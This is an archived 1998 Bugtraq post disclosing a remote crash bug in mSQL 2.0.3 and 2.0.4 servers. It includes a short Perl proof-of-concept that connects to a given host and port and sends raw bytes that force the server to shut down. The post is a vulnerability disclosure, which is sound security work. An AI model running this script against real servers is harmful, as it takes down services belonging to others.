Bugtraq mailing list archives
mSQL dummies
From: boutzev () usa net (Peter Boutzev)
Date: Wed, 11 Nov 1998 19:09:27 +0100
Hello to everyone,

That is: in function "msqlConnect()", libmsql checks the user name of
the logged user. Ok, let's try to connect to an mSQL server without sending it.
I thought that my prog did not work, because it was unable to connect to the mSQL
server. After several retries, I understood that the server had gone away. I
restarted it, and made a new connection. Here is what happens:

---------------
Hit by a sig 11
Forced server shutdown due to bad signal!
IOT trap/Abort
-------------

I discovered this when I was doing an mSQL client with an old
libmsql.dll under Windows. I have no time to look further into the problem,
and I am using mySQL now. Anyway here is a small cut of code that demonstrates
the problem.

------------------------- CUT HERE --------------------------
#!/usr/bin/perl
use IO::Socket;

# Host and port of the mSQL server are taken from the command line
$host = $ARGV[0];
$port = $ARGV[1];
&Connect;

sub Connect {
    $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => "msql($port)",
    ) or die "Cannot connect !";
    $sock->autoflush(1);
    # Raw bytes written to the server straight after connecting
    print $sock "\x05\x00\x00\x00\x00\x0A\x03\x31\x3A\x0A";
    # Print whatever the server sends back
    while (<$sock>) {
        print;
    }
    printf "Y0!-y0-Y0!\n";
}
------------------------------ END ---------------------------

I don't know whether this was discussed here before or not. I informed Hughes
Technologies 5 months ago, and they did not respond to me. Maybe in the new
mSQL 2.0.5 or later the bug was patched, I have no time to test it. 2.0.3
and 2.0.4 seem to be vulnerable. I am not sure about gaining remote access
with this. Anyway, I thought that it should be posted here...
